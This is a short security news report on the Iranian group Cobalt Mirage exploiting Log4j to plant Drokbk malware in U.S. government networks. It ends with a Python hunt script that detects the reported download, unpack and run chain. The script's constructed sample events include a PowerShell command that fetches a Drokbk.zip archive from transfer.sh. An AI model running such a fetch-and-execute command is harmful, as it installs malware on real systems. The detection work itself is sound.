Iranian advanced persistent threat group Cobalt Mirage, also known as UNC2448 or Nemesis Kitten, has exploited the Log4j vulnerability to compromise numerous U.S. local government networks with the Drokbk malware since February, according to The Record, a news site by cybersecurity firm Recorded Future.
Secureworks researchers also believe Cobalt Mirage is behind a separate attack, reported by the Cybersecurity and Infrastructure Security Agency, in which a federal agency's server was compromised through exploitation of the Log4j vulnerability.
Drokbk malware, which was found to be deployed following network infiltration, was also revealed to leverage GitHub for securing its command-and-control infrastructure.
"The February intrusion that Secureworks incident responders investigated began with a compromise of a VMware Horizon server using two Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45046). Forensic artifacts indicated Drokbk.exe was extracted from a compressed archive (Drokbk.zip) hosted on the legitimate transfer.sh online service. The threat actors extracted the file to C:\Users\DomainAdmin\Desktop and then executed it," said Secureworks.
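As an added defender-side illustration (not code from Secureworks or the article), the hunt below correlates constructed Sysmon-style events into the chain the quote describes: an archive fetched from transfer.sh, a same-named executable written under a user's Desktop folder, and that executable being launched. The event fields, hostnames and command lines are assumptions, not real telemetry.

```python
import re
from collections import defaultdict

# Constructed sample events (not real telemetry). Host "horizon01" shows the
# full chain; host "ws02" is benign archive activity that must not match.
SAMPLE_EVENTS = [
    {"id": 1, "type": "ProcessCreate", "host": "horizon01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -c Invoke-WebRequest https://transfer.sh/abc123/Drokbk.zip "
            r"-OutFile C:\Users\DomainAdmin\Desktop\Drokbk.zip"},
    {"id": 2, "type": "FileCreate", "host": "horizon01",
     "target": r"C:\Users\DomainAdmin\Desktop\Drokbk.exe"},
    {"id": 3, "type": "ProcessCreate", "host": "horizon01",
     "image": r"C:\Users\DomainAdmin\Desktop\Drokbk.exe", "cmd": "Drokbk.exe"},
    {"id": 4, "type": "ProcessCreate", "host": "ws02",
     "image": r"C:\Program Files\7-Zip\7z.exe", "cmd": "7z x report.zip"},
]

# <archive stem>.zip fetched from transfer.sh anywhere in a command line
TRANSFER_ARCHIVE = re.compile(r"https?://transfer\.sh/\S*?/([^/\s]+)\.zip", re.I)
# <stem>.exe directly under any user's Desktop folder
DESKTOP_EXE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\Desktop\\([^\\]+)\.exe$", re.I)


def find_drokbk_like_chains(events):
    """Per host, in event order: transfer.sh archive download -> .exe with the
    same stem created under Desktop -> that .exe executed. Returns findings."""
    per_host = defaultdict(list)
    for ev in events:
        per_host[ev["host"]].append(ev)
    findings = []
    for host, evs in per_host.items():
        stem = download_id = extracted_id = None
        for ev in evs:
            if ev["type"] == "ProcessCreate":
                m = TRANSFER_ARCHIVE.search(ev.get("cmd", ""))
                if m:  # stage 1: archive pulled from transfer.sh
                    stem, download_id, extracted_id = m.group(1), ev["id"], None
                    continue
                m = DESKTOP_EXE.match(ev.get("image", ""))
                if m and extracted_id and m.group(1).lower() == stem.lower():
                    findings.append({"host": host, "archive": stem + ".zip",
                                     "events": [download_id, extracted_id, ev["id"]]})
            elif ev["type"] == "FileCreate" and stem:
                m = DESKTOP_EXE.match(ev.get("target", ""))
                if m and m.group(1).lower() == stem.lower():  # stage 2: unpacked
                    extracted_id = ev["id"]
    return findings
```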